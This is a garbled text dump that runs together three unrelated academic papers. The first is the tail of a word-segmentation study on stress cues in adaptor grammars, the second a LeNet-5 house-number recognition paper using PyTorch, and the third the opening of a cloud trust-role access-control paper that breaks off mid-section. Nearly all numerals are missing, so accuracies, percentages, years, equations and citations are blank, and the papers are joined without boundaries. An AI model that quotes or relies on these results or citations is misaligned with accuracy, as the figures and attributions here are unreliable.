a lag of iterations between each sample af- ter a burn-in of iterations, using both batch- initialization and table-label resampling to ensure good convergence of the sampler. we construct a single segmentation from the posterior samples us- ing their minimum bayes risk decoding, providing a single score for each condition. . experimental conditions each of our six models is evaluated on inputs of in- creasing size, starting at and ending at , utterances, allowing us to investigate both how per- formance and “knowledge” of the learner varies as a function of input size. for completeness, we also report the “standard” evaluation, i.e. performance of our models on all corpora when trained on the entire input in table . we will focus our discussion on the results obtained on the alex corpus, which are de- picted in figure , where the input size is depicted on the x-axis, and the segmentation f-score for the test-set on the y-axis. discussion we find a clear improvement for the stress-models over both the colloc -nophon and the colloc -phon models. as can be seen in table , the overall trend is the same for all three corpora, both when evaluating on the input and the separate test-set. we performed wilcox rank sum tests on the individual scores of the independent chains for each model on the full training data sets and found that the stress-models were always note how the relative gain for stress is roughly % higher when evaluating on the test-set; this might have to do with jusczyk ( )’s observa- tion that the advantage of stress “might be more evident for relatively unexpected or unfamiliarized strings” (jusczyk, ). a closer look at figure indicates further interesting differences between the colloc -nophon and the colloc -phon models that only become evident when considering different in- put sizes. . stress cues without phonotactics for the colloc -nophon models, we observe a rel- atively stable improvement by adding stress cues of - %, irrespective of input size and whether or not the unique stress constraint (usc) is assumed. 
the sole exception to this occurs when the learner only gets to see utterances: in this case, the colloc-nophon-stress model only shows a % im- provement, whereas the colloc -nophon-stress-usc model obtains a boost of roughly %. noticeable consistent differences between the colloc -nophon- stress and colloc -nophon-stress-usc model, how- ever, all but disappear starting from around ut- terances. this is somewhat surprising, considering that it is the usc that was argued by yang ( ) to be key for taking advantage of stress. we take this behaviour to indicate that even with as little evidence as to utterances, a bayesian ideal learner can effectively infer that something like the usc is true of english. this also becomes clear when examining how the learn- ers’ preferences for different stress patterns evolve over time, as we do in section . below. . stress cues and phonotactics overall, the models including phonotactic cues per- form better than those that do not rely on phono- tactics. however, the overall gain contributed by stress to the colloc -phon baseline is smaller, al- significantly more accurate (p < . ) than the baseline models except when evaluating on the training data for the korman and brent corpora. on data in which function words are marked for stress (as in yang ( ) and doyle and levy ( )), the usc yields ex- tremely high scores across all models, simply because roughly every second word is a function word. given that this assump- tion is extremely unnatural, we do not take this as an argument for the usc. . . . . . number of input utterances se g m e n ta tio n f − sc o re colloc −nophon colloc −phon colloc −nophon−stress colloc −phon−stress colloc −nophon−stress−usc colloc −phon−stress−usc figure : segmentation performance of the different models, across different input sizes and as evaluated on the test-set for the alex corpus. the no-stress baselines are given in red, the stress-models without the unique stress constraint (usc) in green and the ones including the usc in black. solid lines indicate models that use, dashed lines models that do not use phonotactics. refer to the text for discussion. though this seems to depend on the size of the input. while phonotactics by itself appears to be a pow- erful cue, yielding a noticeable - % improvement over the colloc -nophon baseline, the learner seems to require at least around utterances before the colloc -phon model becomes clearly more accurate than the colloc -nophon model. in contrast, even for only utterances stress cues by themselves provide a % improvement to the colloc -nophon model, indicating that they can be taken advantage of earlier. while the number of utterances processed by a bayesian ideal learner is not directly related to developmental stages, this observation is consistent with the psycholinguists’ claim that phonotactics are used by infants for word segmentation after they have begun to use stress for segmentation (jusczyk et al., a). turning to the interaction between stress and phonotactics, we see that there is no consistent ad- vantage of including the usc in the model. this is, in fact, even clearer than for the colloc -nophon model where at least for small inputs of size , the usc added almost % in performance. for the colloc -phon models, we only observe a - % im- provement by adding the usc up until utter- ances. 
this further strengthens the point that even in the absence of such an innate constraint, a statisti- cal learner can take advantage of stress cues and, as we show below, actually acquire something like the usc from the input. the % difference between the colloc -phon- stress / colloc -phon-stress-usc models to the colloc -phon baseline is smaller than the % dif- ference between the colloc -nophon and colloc - nophon-stress models. this shows that there is a redundancy between phonotactic and stress cues in large amounts of data, as their joint contribution to the colloc -nophon baseline is less than the sum of their individual contributions at , utterances, of % (for phonotactics) and % (for stress). unlike for the colloc -nophon models, we also see a clear impact of input size. in particular, at utterances the addition of stress cues leads to an – % improvement, depending on whether or not the usc is assumed, whereas for the colloc - nophon model we only observed a – % improve- ment. this is particularly striking when we con- sider that by themselves, the phonotactic cues only contribute a % improvement to the colloc -nophon baseline when trained on the utterance corpus, indicating a synergistic interaction (rather than re- dundancy) between phonotactics and stress for small inputs. this effect disappears starting from around utterances; for inputs of size and larger, the net-gain of stress drops from roughly % to a – % improvement. that is, while we did not notice any relationship between input size and impact of stress cues for the colloc -nophon model, we do see such an interaction for the combination of phonotac- tics and stress cues which, taken together, lead to a larger relative gain in performance on smaller inputs than on large ones. . acquisition of stress patterns in addition to acquiring a lexicon, the bayesian learner acquires knowledge about the possible stress patterns of english words. the fact that this knowl- edge is explicitly represented through the pcfg rules and their probabilities that define the lexi- cal generator allows us to study the generalisations about stress the model actually acquires. while doyle and levy ( ) suggest carrying out such an analysis, they restrict themselves to estimating the fraction of stress patterns in the segmented out- put. as shown in table , however, the type and token distributions of stress patterns can differ sub- stantially. we therefore investigate the stress pref- erences acquired by our learner by examining the probabilities assigned to the different expansions of rule ( ), aggregating the probabilities of the indi- vidual rules into patterns. for example, the rules word → ssyll ( usyll ){ , } correspond to the pattern “stress on the first syllable”, whereas the rules word → usyll{ , } correspond to the pat- tern “unstressed word”. by computing the respec- tive probabilities, we get the overall probability as- signed by a learner to the pattern. figure provides this information for several dif- ferent rule patterns. additionally, these plots in- clude the empirical type (red dotted) and token pro- portions (red double-dashed) for the input corpus. note how for the two major patterns, all models suc- cessfully track the type, rather than the token fre- quency, correctly developing a preference for stress- initial over unstressed words, despite the compa- rable token frequency of these two patterns. 
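the aggregation described here—summing the probabilities of the word-expansion rules that instantiate a given stress pattern—can be sketched as follows. the rule probabilities below are invented placeholders (a uniform distribution over all expansions of up to four syllables); in the experiments they are posterior samples from the fitted grammars.

```python
from itertools import product

def pattern(rhs):
    """Map a Word expansion (a tuple of 'S'/'U' syllables) to a pattern name."""
    if rhs.count("S") >= 2:
        return "violates USC"
    if "S" not in rhs:
        return "unstressed word"
    if rhs[0] == "S":
        return "stress on first syllable"
    if len(rhs) >= 2 and rhs[1] == "S":
        return "stress on second syllable"
    return "other single-stress pattern"

# placeholder probabilities over all Word -> {SSyll|USyll}{1,4} expansions
expansions = [rhs for n in range(1, 5) for rhs in product("SU", repeat=n)]
rule_prob = {rhs: 1.0 / len(expansions) for rhs in expansions}

aggregate = {}
for rhs, p in rule_prob.items():
    name = pattern(rhs)
    aggregate[name] = aggregate.get(name, 0.0) + p

for name, p in sorted(aggregate.items()):
    print(f"{name}: {p:.3f}")
```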
this is compatible with a recent proposal by thiessen and saffran ( ), who argue that infants infer the stress pattern over their lexicon. for a bayesian model such as ours or goldwater et al. ( )'s, there is no need to pre-specify that the distribution ought to be learned over types rather than tokens, as the models automatically interpolate between type and token statistics according to the properties of their input (goldwater et al., ). in addition, a bayesian framework provides a simple answer to the question of how a learner might identify the role of stress in its language without already having acquired at least some words. by combining different kinds of cues, e.g. distributional, phonotactic and prosodic, in a principled manner a bayesian learner can jointly segment its input and learn the appropriate role of each cue, without having to pre-specify preferences that might differ across languages.
the iambic rule pattern that puts stress on the second syllable is much more infrequent on a token level. all models track this low token frequency, underestimating the type frequency of this pattern by a fair amount. this suggests that learning this pattern correctly requires considerably more input than for the other patterns. indeed, the iambic pattern is known to pose problems for infants when they start using stress as an effective cue. it is only from roughly months of age that infants successfully segment iambic words (jusczyk et al., b). not surprisingly, the usc doesn't aid in learning about this pattern because it is completely silent on where stress might fall (and does not noticeably improve segmentation performance to begin with).
finally, we can also investigate whether the models that lack the usc nevertheless learn that words contain at most one lexically stressed syllable. the bottom-right graph in figure plots the probability assigned by the models to patterns that violate the usc. this includes, for example, the rules word → sylls sylls and word → sylls syllu sylls . note how the probabilities assigned to these rules approach zero, indicating that the learner becomes more certain that there are no words that contain more than one syllable with lexical stress. as we argued above, this suggests that a bayesian learner can acquire the usc from a modest amount of data — it will properly infer that the unnatural patterns are simply not supported by the input.
figure : evolution of the knowledge the learner acquires on the alex corpus. the red dotted line indicates the empirical type distribution of a specific pattern, and the double-dashed line the empirical token distribution. top-left: stress-initial pattern, top-right: unstressed words, bottom-left: stress-second pattern, bottom-right: patterns that violate the usc.
to summarize, by examining the internal state of the bayesian learners we can characterise how their knowledge about the stress preferences of their languages develops, rather than merely measuring how well they perform word segmentation. we find that the iambic pattern that has been observed to pose problems for infant learners also is harder for the bayesian learner to acquire, arguably due to its extremely low token-frequency.
conclusion and future work we have presented adaptor grammar models of word segmentation that are able to take advantage of stress cues and are able to learn from phonemic input. we find that phonotactics and stress interact in interesting ways, and that stress cues makes a sta- ble contribution to existing word segmentation mod- els, improving their performance by - % token f- score. we also find that the usc introduced by yang ( ) need not be prebuilt into a model but can be acquired by a bayesian learner from the data. sim- ilarly, we directly investigate the stress preferences acquired by our models and find that for stress-initial and unstressed words, they track type rather than token frequencies. the rare stress-second pattern seems to require more input to be properly acquired, which is compatible with infant development data. an important goal for future research is to eval- uate segmentation models on typologically different languages and to study the relative usefulness of dif- ferent cues cross-lingually. for example, languages such as french lack lexical stress; it would be inter- esting to know whether in such a case, phonotactic (or other) cues are more important. relatedly, recent work such as börschinger et al. ( ) has found that artificially created data often masks the com- plexity exhibited by real speech. this suggests that future work should use data directly derived from the acoustic signal to account for contextual effects, rather than using dictionary look-up or other heuris- tics. in using the alex corpus, for which good qual- ity audio is available, we have taken a first step in this direction. acknowledgements this research was supported by the australian research council’s discovery projects funding scheme (project numbers dp and dp ). we’d like to thank professor dupoux and our other colleagues at the laboratoire de sciences cognitives et psycholinguistique in paris for hosting us while this research was per- formed, as well as the mairie de paris, the fondation pierre gilles de gennes, the ecole des hautes etudes en sciences sociales, the ecole normale supérieure, the region ile de france, the european research council (erc- -adg- boot- phon), the agence nationale pour la recherche (anr- -blan- - bootlang, anr- -idex- - and anr- -labx- ) and the fondation de france. we’d also like to thank three anonymous reviewers for helpful comments and suggestions. references n. bernstein-ratner. . the phonology of parent- child speech. in k. nelson and a. van kleeck, editors, children’s language, volume . erlbaum, hillsdale, nj. benjamin börschinger, katherine demuth, and mark johnson. . studying the effect of input size for bayesian word segmentation on the providence cor- pus. in proceedings of the th international con- ference on computational linguistics (coling ), pages – . coling organizing committee. benjamin börschinger, mark johnson, and katherine de- muth. . a joint model of word segmentation and phonological variation for english word-final /t/- deletion. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – . association for computational linguistics. m. brent. . an efficient, probabilistically sound algorithm for segmentation and word discovery. ma- chine learning, : – . m. christiansen and s. curtin. . the power of sta- tistical learning: no need for algebraic rules. in pro- ceedings of the st annual conference of the cogni- tive science society. 
morten h christiansen, joseph allen, and mark s sei- denberg. . learning to segment speech using multiple cues: a connectionist model. language and cognitive processes, ( - ): – . suzanne curtin, toben h mintz, and morten h chris- tiansen. . stress changes the representational landscape: evidence from word segmentation. cog- nition, ( ): – . anne cutler and david m carter. . the predomi- nance of strong initial syllables in the english vocabu- lary. computer speech and language, ( ): – . anne cutler, jacques mehler, dennis norris, and juan segui. . the syllable’s differing role in the seg- mentation of french and english. journal of memory and language, ( ): – . anne cutler. . lexical stress. in david b. pisoni and robert e. remez, editors, the handbook of speech perception, pages – . blackwell pub- lishing. k. demuth, j. culbertson, and j. alter. . word- minimality, epenthesis, and coda licensing in the ac- quisition of english. language and speech, : – . gabriel doyle and roger levy. . combining mul- tiple information types in bayesian word segmenta- tion. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – . association for computational linguistics. victoria fromkin, editor. . linguistics: an intro- duction to linguistic theory. blackwell, oxford, uk. sharon goldwater, tom griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in y. weiss, b. schölkopf, and j. platt, editors, advances in neural information processing systems , pages – . mit press. sharon goldwater, thomas l. griffiths, and mark john- son. . a bayesian framework for word segmen- tation: exploring the effects of context. cognition, ( ): – . sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. mark johnson and katherine demuth. . unsu- pervised phonemic chinese word segmentation using adaptor grammars. in proceedings of the rd in- ternational conference on computational linguistics (coling ), pages – . coling organiz- ing committee. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in proceedings of human language technolo- gies: the annual conference of the north amer- ican chapter of the association for computational linguistics, pages – . association for compu- tational linguistics. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for spec- ifying compositional nonparametric bayesian models. in b. schölkopf, j. platt, and t. hoffman, editors, ad- vances in neural information processing systems , pages – . mit press, cambridge, ma. mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of the tenth meeting of acl special interest group on computational morphology and phonology, pages – . association for computational linguistics. mark johnson. b. using adaptor grammars to identify synergies in the unsupervised acquisition of linguistic structure. in proceedings of the th annual meeting of the association of computational linguis- tics, pages – . association for computational linguistics. peter w jusczyk, anne cutler, and nancy j redanz. . infants’ preference for the predominant stress patterns of english words. child development, ( ): – . peter w. jusczyk, e. a. hohne, and a. bauman. a. 
infants’ sensitivity to allophonic cues for word seg- mentation. perception and psychophysics, : – . peter w. jusczyk, derek m. houston, and mary new- some. b. the beginnings of word segmentation in english-learning infants. cognitive psychology, ( - ): – . peter jusczyk. . the discovery of spoken language. mit press, cambridge, ma. myron korman. . adaptive aspects of maternal vo- calizations in differing contexts at ten weeks. first language, : – . constantine lignos and charles yang. . reces- sion segmentation: simpler online word segmentation using limited resources. in proceedings of the four- teenth conference on computational natural lan- guage learning, pages – . association for com- putational linguistics. constantine lignos. . modeling infant word seg- mentation. in proceedings of the fifteenth conference on computational natural language learning, pages – . association for computational linguistics. constantine lignos. . infant word segmentation: an incremental, integrated model. in proceedings of the west coast conference on formal linguistics . brian macwhinney. . the childes project: tools for analyzing talk: volume i: transcription format and programs, volume ii: the database. computational linguistics, ( ): – . sven l mattys and peter w jusczyk. . phonotac- tic cues for segmentation of fluent speech by infants. cognition, ( ): – . sven l mattys. . the perception of primary and secondary stress in english. perception and psy- chophysics, ( ): – . lisa pearl, sharon goldwater, and mark steyvers. . online learning mechanisms for bayesian models of word segmentation. research on language and com- putation, ( ): – . elisabeth o. selkirk. . phonology and syntax: the relation between sound and structure. mit press. erik d thiessen and jenny r saffran. . when cues collide: use of stress and statistical cues to word boundaries by -to -month-old infants. developmen- tal psychology, ( ): . erik d thiessen and jenny r saffran. . learning to learn: infants acquisition of stress-based strategies for word segmentation. language learning and develop- ment, ( ): – . carnegie mellon university. . the cmu pronounc- ing dictionary, v. . a. charles yang. . universal grammar, statistics or both? trends in cognitive sciences, ( ): – . none paper title (use style: paper title) doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , street view house number identification based on deep learning yang haoqi school of computer science and engineering xi’an technological university xi’an, china e-mail: curioyhq@gmail.com yao hongge school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—in this paper, the difficult problem of character recognition in natural scenes caused by many factors such as variability of light in the natural scene, background clutter and inaccurate viewing angle, and inconsistent resolution. based on the deep learning framework pytorch, a convolutional neural network is implemented. based on the classic lenet- network, the network optimizes the input layer to accept three-channel images, changes the pooling method to maximum pooling to simplify parameters, and the activation function is replaced by rectified linear unit with faster convergence. the cross- entropy loss is used instead of the minimum mean square error to mitigate the slow learning. 
furthermore, we also enroll the gradient descent optimization algorithm rmsprop and l regularization to improve the accuracy, speed up the convergence and suppress the over-fitting. the experiment results show that our model achieved an accuracy of . % after training for h min on the street view house number(svhn) dataset, effectively improving the performance of lenet- . keywords-house number identification; convolutional neural network; lenet- i. introduction the traditional method of classifying house numbers from natural scene images is usually to use manual feature extraction[ - ] and template matching[ - ]. in order to identify the house number of the corridor environment, zhang shuai et al. used the combination of robert edge detection and morphological operation to locate the position of the house number image, and then divide the house number by horizontal and vertical projection method, tilt correction, etc., and finally use pattern recognition to identify the house number [ ]. ma liling et al. used the linear discriminant linear local tangent space alignment algorithm (odlltsa) and the support vector machine (svm) method to identify the house number, use the extracted features to train the svm classifier, and use the svm classifier to the new house number classification [ ]. for these traditional methods, the key to determining their performance is to have a good classifier, and the features in the classifier are mostly designed manually (such as sift, surf, hog, etc.), and the features of the artificial design are well interpreted. however, in the face of complex backgrounds, changing fonts and various deformations, it is rather troublesome and difficult to extract more general features[ ]. the convolutional neural network (cnn) is a multi-layered supervised learning neural network. although the training process requires a large amount of data compared with the traditional method, the convolutional neural network can automatically summarize the target feature from these data. features do not require human intervention. overcome the shortcomings of manual design features that are time- consuming and labor-intensive, have poor general use and require high experience in the designer field. it is precise because of these advantages of convolutional neural networks that a large number of researchers have begun to apply it to solve character recognition problems. in response to this situation, we implemented a lenet- -based neural network based on the deep learning framework pytorch and achieved an accuracy of . % on the svhn dataset at a time of hours and minutes. ii. related work a. network structure the network used in this experiment is modified by lenet- as shown in figure . lenet- appeared to solve the problem of recognition of handwritten characters. the data set used in the training process is the mnist. the samples in the data set are single- international journal of advanced network, monitoring and controls volume , no. , channel grayscale images, and the street view dataset is the three-channel color picture, to improve the robustness of the model, minimize the intervention on the original data set, we do not pre-process it, such as grayscale, but choose to adjust the input layer of lenet- to three channels. figure . 
The pooling layer in the original LeNet-5 differs from the pooling operation commonly used today, so we replace it directly with a max-pooling layer, which also reduces the number of trainable parameters; this helps control the scale of the network and speeds up training. As for the activation function, the original LeNet-5 uses sigmoid or tanh; here we use the rectified linear unit (ReLU), which converges faster and has no significant impact on the generalization accuracy of the model.

LeNet-5's loss function is the minimum mean squared error:

L_MSE = (1/N) Σ_{i=1}^{N} (ŷ_i − y_i)²

where N is the number of samples, ŷ_i is the predicted value of the i-th sample, and y_i is the label of the i-th sample. When back-propagating with gradient descent, the mean squared error tends to produce a very small gradient once the neuron output saturates, so learning becomes slow. We therefore use the cross-entropy loss function:

L_CE = −(1/N) Σ_{i=1}^{N} Σ_c y_{i,c} log ŷ_{i,c}

where y_{i,c} is the one-hot label and ŷ_{i,c} is the predicted probability of class c for the i-th sample. In addition to the above improvements, we introduce four optimization algorithms: SGD (with momentum), Adam, Adamax, and RMSprop.

B. Comparison of different optimizers

The package torch.optim in PyTorch provides a large number of optimization algorithms, commonly referred to as optimizers. We take the widely used SGD, Adam, Adamax and RMSprop optimizers, configured with the parameters listed in the table below, train each for the same number of epochs, and compare their effect on the SVHN dataset using the improved LeNet-5 network proposed in this paper. The figure shows that the network trained with the SGD optimizer shows almost no improvement in test-set accuracy during the early epochs and only starts to rise significantly much later, whereas the networks trained with the other three optimizers reach a good test-set accuracy within the first ten epochs, with RMSprop improving the fastest. In the subsequent experiments we therefore use RMSprop as the default optimizer.

Table: Optimizer parameter settings — SGD (lr = . ), Adam (lr = . ), Adamax (lr = . ), RMSprop (lr = . ).

Figure: Optimizer effect.

It can also be observed that, apart from the SGD optimizer, the test-set accuracy does not improve much in the later stage of training, and the test-set accuracy of the other three networks even shows a small downward trend. The table below reports the best test-set accuracy for each optimizer. The difference between the highest accuracies on the SVHN test set is only . %, so the four optimizers can be considered comparable in their effect on final accuracy. Regarding when the best accuracy is reached, only the SGD network attains it late in training; the other three optimizers reach their best accuracy relatively early, indicating that their performance declines in the later part of training. The network may already be over-fitting, so it is necessary to introduce further evaluation and to counter over-fitting.

Table: Optimizer training results (best test accuracy, %) — SGD: . ; Adam: . ; Adamax: . ; RMSprop: . .

C. Comparison of L2 regularization under different weight decay coefficients

In the face of possible over-fitting, one possible countermeasure is the introduction of regularization.
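As a concrete illustration of these choices, the sketch below sets up the cross-entropy loss and the four optimizers compared above. The learning rates, momentum and weight-decay values are placeholders rather than the paper's settings; a non-zero weight_decay corresponds to the L2 regularization examined next.

```python
import torch
import torch.nn as nn

# Cross-entropy loss replaces the MSE loss of the original LeNet-5;
# in PyTorch it combines log-softmax with negative log-likelihood.
criterion = nn.CrossEntropyLoss()

def make_optimizer(name, params, lr=1e-3, weight_decay=0.0):
    """Build one of the four optimizers compared in the paper.

    lr and weight_decay are illustrative placeholders; weight_decay > 0
    implements the L2 penalty discussed in the following subsection.
    """
    if name == "sgd":
        return torch.optim.SGD(params, lr=lr, momentum=0.9, weight_decay=weight_decay)
    if name == "adam":
        return torch.optim.Adam(params, lr=lr, weight_decay=weight_decay)
    if name == "adamax":
        return torch.optim.Adamax(params, lr=lr, weight_decay=weight_decay)
    if name == "rmsprop":
        return torch.optim.RMSprop(params, lr=lr, alpha=0.99, weight_decay=weight_decay)
    raise ValueError(f"unknown optimizer: {name}")
```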
We first apply L2 regularization and introduce three further indicators — training-set accuracy, training-set loss and test-set loss — to enrich the evaluation of the experimental results. The experimental design is as follows: the default optimizer is RMSprop (lr = . , alpha = . ), the maximum number of iterations is still epochs, and four values of the weight decay coefficient (weight_decay), which controls the strength of the L2 penalty, are compared. The best results and the epochs at which they occur are listed in the table below, and the corresponding accuracy and loss curves are shown in the figures.

The training-set loss curves show a smooth downward trend under all four values of the weight decay coefficient. Comparing the training-set accuracy with the test-set accuracy, the difference under each weight decay coefficient stays within about %, which is acceptable. However, the test-set loss curve for one of the smaller weight decay coefficients first decreases and then increases, which indicates that over-fitting appears under that parameter: when the improved LeNet-5 network is trained on the SVHN dataset, that coefficient cannot suppress over-fitting, and a higher weight decay coefficient should be chosen. The table also shows that one particular coefficient gives better results than the other settings; on the test-accuracy curves, its curve lies above the others and is smoother and less oscillatory in the later stage of training. The above analysis shows that, among the four weight decay coefficients considered, this coefficient avoids over-fitting and achieves the best training results.

Table: Results for different weight_decay values; for each coefficient the table reports the best training accuracy in % (with its epoch) and the best test accuracy in % (with its epoch).

Figures: Training accuracy, training loss, test accuracy and test loss under the different regularization settings.

III. Experiment and Analysis

A. SVHN (the Street View House Numbers) dataset

For the task of identifying street view numbers, the best-known public dataset is currently SVHN. SVHN is a real-world image dataset aimed at the development of machine learning and object detection algorithms with minimal need for data preprocessing and format conversion. The dataset has ten label classes, one for each digit. In general, SVHN contains three subsets — a training set, a test set and an extra set — and is released in two formats of differing recognition difficulty: full-resolution images with character-level bounding boxes that contain the entire house number together with a small amount of wall background, and 32 x 32 pixel crops centered on a single digit, similar in format to the MNIST dataset (see the example figures below).
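The cropped 32 x 32 format is available directly through torchvision, which exposes the three subsets as separate splits. A loading sketch, where the data directory, transform and batch size are placeholders:

```python
from torch.utils.data import DataLoader
from torchvision import datasets, transforms

# ToTensor keeps the three color channels; no grayscale conversion is applied,
# matching the choice to feed RGB images to the modified network.
transform = transforms.ToTensor()

train_set = datasets.SVHN(root="data", split="train", transform=transform, download=True)
test_set  = datasets.SVHN(root="data", split="test",  transform=transform, download=True)
extra_set = datasets.SVHN(root="data", split="extra", transform=transform, download=True)  # used for augmentation later

train_loader = DataLoader(train_set, batch_size=128, shuffle=True)
test_loader  = DataLoader(test_set, batch_size=128, shuffle=False)
```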
The latter, cropped style is very similar to the classic MNIST dataset but is larger and harder to recognize: the training set consists of hard-to-recognize digit images, the test set consists of further digit images, and there is an additional set of somewhat simpler digit images that can be used to extend the training data. Unless otherwise stated, the SVHN dataset mentioned later in this article refers to the cropped format.

Figures: SVHN full house-number images; SVHN cropped single-digit images.

B. Data augmentation

Expanding the dataset is also an effective means of improving model accuracy. The size of each SVHN subset is shown in the table below; the extra set is officially described as usable for extending the training data. The figures below show a small number of samples and their labels from each subset. The resolution and brightness of the extra set are high and the background interference is small, so it is indeed easier to recognize by eye than the training and test sets; nevertheless, adding the extra set enlarges the training set to several times its original size, which is still expected to improve model accuracy. Another figure shows the class distribution of the original training set, the extra set and the test set; the proportional distribution of the classes is approximately the same in the three subsets, so the distribution of the new training set that incorporates the extra set is similar to that of the original training set. This similarity helps to suppress any adverse influence the extra set might otherwise introduce into model training.

Table: Number of samples in each SVHN subset (training set, extra set, test set).

Figures: Example images from the training set, the extra set and the test set; class distribution of the SVHN subsets.

The effect of training before and after introducing the extra set is shown in the table and figure below. One point to note is that the visualization tool Visdom rescales its plots automatically and hides blank chart areas, so the curves for the different training sets do not necessarily share the same vertical-axis origin and scale. The training-set accuracy stays below % and the test-set loss curve shows a downward trend, indicating that no over-fitting occurs after expanding the dataset; the test-set accuracy changes only slightly in the later period, indicating that the model tends to converge, and the model trained on the extended training set reaches a higher accuracy than the one trained without it. The table shows that the training time after expanding the training set is h min, and the best accuracy increases by . % compared with training without the expansion.

Table: Results before and after data augmentation (number of training samples, number of test samples, best test accuracy, training time).

Figure: Training of the model after adding data augmentation. Figure: Test results.
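A sketch of the augmentation step and of a minimal per-epoch training/evaluation loop consistent with the procedure described above. It assumes the model, loss, optimizer and data loaders from the earlier sketches; the batch size and device are placeholders.

```python
import torch
from torch.utils.data import ConcatDataset, DataLoader

# Extend the training data with the "extra" split, as described above.
full_train = ConcatDataset([train_set, extra_set])
full_train_loader = DataLoader(full_train, batch_size=128, shuffle=True)

def run_epoch(model, loader, criterion, optimizer=None, device="cpu"):
    """One pass over `loader`; trains if an optimizer is given, otherwise evaluates."""
    training = optimizer is not None
    model.train(training)
    total_loss, correct, count = 0.0, 0, 0
    with torch.set_grad_enabled(training):
        for images, labels in loader:
            images, labels = images.to(device), labels.to(device)
            logits = model(images)
            loss = criterion(logits, labels)
            if training:
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
            total_loss += loss.item() * labels.size(0)
            correct += (logits.argmax(dim=1) == labels).sum().item()
            count += labels.size(0)
    return total_loss / count, correct / count
```

Recording the returned loss and accuracy for both the training and the test loader at every epoch yields curves of the kind discussed in the regularization and augmentation comparisons above.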
IV. Conclusion

The convolutional neural network applied to the SVHN dataset improves the classic LeNet-5 network as follows: (1) the input layer is modified to accept three-channel images; (2) the pooling, activation and loss functions are switched to the more commonly used max pooling, ReLU and cross-entropy loss; (3) the gradient-descent optimization algorithm RMSprop is introduced; (4) L2 regularization is used. The seven-layer convolutional neural network implemented in this paper processes color pictures directly without complicated preprocessing, which improves the versatility of the model, speeds up training and effectively avoids over-fitting. In the end, both the training speed and the prediction accuracy are better than the experimental results reported by Ma Miao et al. for their improved LeNet-5. After expanding the dataset, we tried running for a larger maximum number of epochs, but there was no obvious further improvement in test accuracy; future improvements should therefore target the model itself, for example deepening the network to obtain richer features.

References
[1] Mori S, Suen C Y, Yamamoto K. Historical review of OCR research and development. Proceedings of the IEEE.
[2] Plamondon R, Srihari S N. Online and off-line handwriting recognition: a comprehensive survey. IEEE Transactions on Pattern Analysis and Machine Intelligence.
[3] De Campos T E, Babu B R, Varma M. Character recognition in natural images. VISAPP.
[4] Yamaguchi T, Nakano Y, Maruyama M, et al. Digit classification on signboards for telephone number recognition. IEEE.
[5] Zhang Shuai, Su Shi-tao. Doorplate identification for mobile robot in hallway based on morphological operations. Modern Electronics Technique.
[6] Ma Li-ling. An algorithm based on ODLLTSA and SVM classifier for door plate number recognition. Journal of Central South University (Science and Technology).
[7] Zhou Cheng-wei. Recognition of numbers in natural scene with convolutional neural network. Computer Technology and Development.

International Journal of Advanced Network, Monitoring and Controls

Research on Trust-Role Access Control Model in Cloud Computing

Yuchen Wu, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China. E-mail: @qq.com
Pingping Liu, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China. E-mail: @qq.com

Abstract—To ensure the security of data in cloud computing, a hybrid access control model based on trust and roles is proposed, combining the role-based and trust-based access control models. The model introduces the calculation of trust on top of role-based access control: a user must pass a trust-value check in order to obtain permission to access data. Application in a local business system shows that the model can effectively govern users' legitimate access to data in the cloud and thereby protect the security of that data. The trust-role-based access control model also has clear advantages in terms of system throughput and storage space.
As the number of user requests increases, the throughput of both access control methods rises significantly; when the number of user requests reaches a certain level, the system throughput of both methods begins to fall, but the trust-role access control method always achieves higher throughput than the plain role-based method, by roughly ten percent overall.

Keywords—cloud computing access control; data security; trust value

I. Introduction

Cloud computing [ ] is a commercial realization of distributed processing, parallel processing and grid computing; its main features are large scale, virtualization, high reliability, high scalability and on-demand services. In a cloud environment, various resources are dynamically connected to the Internet; users can not only request services, but all participants in the cloud environment can dynamically join or quit [ ]. However, with the popularization of cloud computing, security failures of cloud computing services occur frequently, and the associated cloud security issues are increasingly prominent. For example, users have no absolute control over data stored in the cloud, so its integrity and confidentiality cannot be guaranteed, and cloud service providers are themselves untrustworthy to some degree. These potential data security problems constrain the development of cloud computing in archival data management, and access control is one of the main means of solving them. By studying several traditional access control methods, this paper introduces the concept of subject trust into the role-based access control method and proposes a hybrid "trust-role" access control method. Experiments show that, to a certain extent, the method can improve the credibility of the system, reduce the probability of task execution failure and spoofing, effectively prevent illegal users from accessing resources and legitimate users from exceeding their authority, and ensure the integrity and confidentiality of data in the cloud.

II. Traditional Access Control

A. Autonomous access control and mandatory access control

Autonomous (discretionary) access control [ ] is an access control policy based on subject authorization. This method is autonomous, but it makes the authority of the subject too powerful, and the security level of the system is low. In mandatory access control, the system's subjects and objects are given security attributes by the system administrator, and a subject cannot modify its own security attributes; however, because of its lack of flexibility and its limited support for authorization management, it is generally not used in large distributed systems.

B. Role-based access control method

The role-based access control (RBAC) model introduces the concept of a "role" [ ]. The main idea is to decouple subjects from objects: access rights are not granted directly to subjects over objects but are assigned to roles. This "user-role-privilege" relationship makes access control more flexible. However, as the number of roles increases, the relationships between roles become more complicated, which affects system performance and reduces system security. Furthermore, this passive security model is not well suited to distributed environments [ ].

III.
Hybrid Access Control Based on the "Trust-Role" Model

A. Introducing trust

Trust [ ] is an assessment of a subject's identity and of its activity in the system, and is closely related to the subject's reliability and integrity. We introduce the concept of trust on top of the role-based access control model: when a subject tries to access object resources, not only is its role verified but its trust value is also calculated, so system data is protected by a double layer of trust and role verification. The trust value [ ] is obtained from three aspects: the direct trust degree, the recommendation trust degree and the historical operation trust degree. The direct trust degree is obtained from the subject's identity verification and user authority; the recommendation trust degree is computed mainly from recommendation information provided by other subjects and object resources; and the historical operation trust degree is the behavior record accumulated by the subject during its past accesses to object resources.

B. Basic concepts of the model

